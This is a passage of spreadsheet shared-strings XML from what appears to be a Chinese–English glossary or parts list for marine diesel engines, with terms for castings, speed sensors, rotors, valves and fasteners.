        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>套筒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸钢件的修复</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸钢件说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸钢曲柄臂质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸钢轴承支撑质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁测试样本质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁垫块的机座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁件说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸铁氯化物清理方法</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造缸体质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造气缸体的质量控制文件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造气缸体质量规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造凸轮轴箱的质量规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造性能要求</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸造中间机架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用扳手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用螺钉</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转发器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换错误</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换阀总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换开关由标准到手动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器转速信号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转换器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机转速信号</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转数计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速表装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器安装调试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器调试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速传感器调整和测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速计传动装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速计模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速继电器板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速器上推安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速器上推支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速器上推支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速器上推总成支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转速转换器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子磁轭</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子磁轭，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子和扩散器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子清洗工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子制动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子制动器总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转子总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装船调试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">FITTING STAND  FOR STOP CYLINDER </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>与图纸上的描述不符</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装配图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装载台架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装载心轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装置规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线盒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>装置信息数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥体橡胶组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥销</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形隔板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形管防护</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形管分段</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形管绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形焊料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形块</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥形销</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锥型垫</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动攻丝环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动化参数</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动化参数指南</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动减负荷</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动控制，进气温度</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动控制板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动滤清器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动滤清器管路布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动润滑油过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动停止装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动主停止阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自锁垫片</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自锁环，毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自锁卡子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自锁螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自锁式垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由端盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由端滑油进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由端上的盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自由螺栓长度说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>纵梁</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>纵剖面</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台轮廓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台支架，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台支架，机械加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台支架布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台支架支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阻塞指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合板式冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合冷却器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组合式液压动力系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组件焊接</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钻刀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>莫尔斯锥度</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
